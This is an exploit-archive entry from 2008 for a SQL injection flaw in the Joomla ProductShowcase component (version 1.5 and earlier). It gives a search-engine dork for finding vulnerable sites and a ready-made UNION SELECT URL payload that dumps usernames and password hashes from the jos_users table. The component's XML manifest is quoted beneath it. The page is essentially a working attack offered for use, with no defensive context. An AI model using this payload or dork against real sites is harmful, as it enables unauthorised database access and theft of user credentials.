[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component ProductShowcase <= 1.5 SQL Injection Vulnerability
# Published : 2008-03-11
# Author : S@BUN
# Previous Title : phpBB Mod FileBase (id) Remote SQL Injection Vulnerability
# Next Title : Danneo CMS <= 0.5.1 Remote Blind SQL Injection Exploit
##########################################
#
# Joomla Component com_productshowcase SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
####HOME : http://securityreason.com/search/101/c0BidW4=/1/0
#
####MA?°L : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORKS 1 : allinurl :"com_productshowcase"
#
###########################################
EXPLOIT :
index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
###########################################
##################S@BUN##################
###########################################
#####hackturkiye.hackturkiye@gmail.com#######
###########################################
<name>ProductShowcase</name>
<creationDate>10 July 2006</creationDate>
<author>Numa Technologies Corporation</author>
<copyright>Copyright ??2006 Numa Technolgies Corporation. All Rights Reserved Worldwide.</copyright>
<authorEmail>scott@numacorp.com</authorEmail>
<authorUrl>www.numacorp.com</authorUrl>
<version>1.5</version>
<description>A Simple Product Gallery.</description>
<version>1.4</version> << as well.
# www.Syue.com [2008-03-11]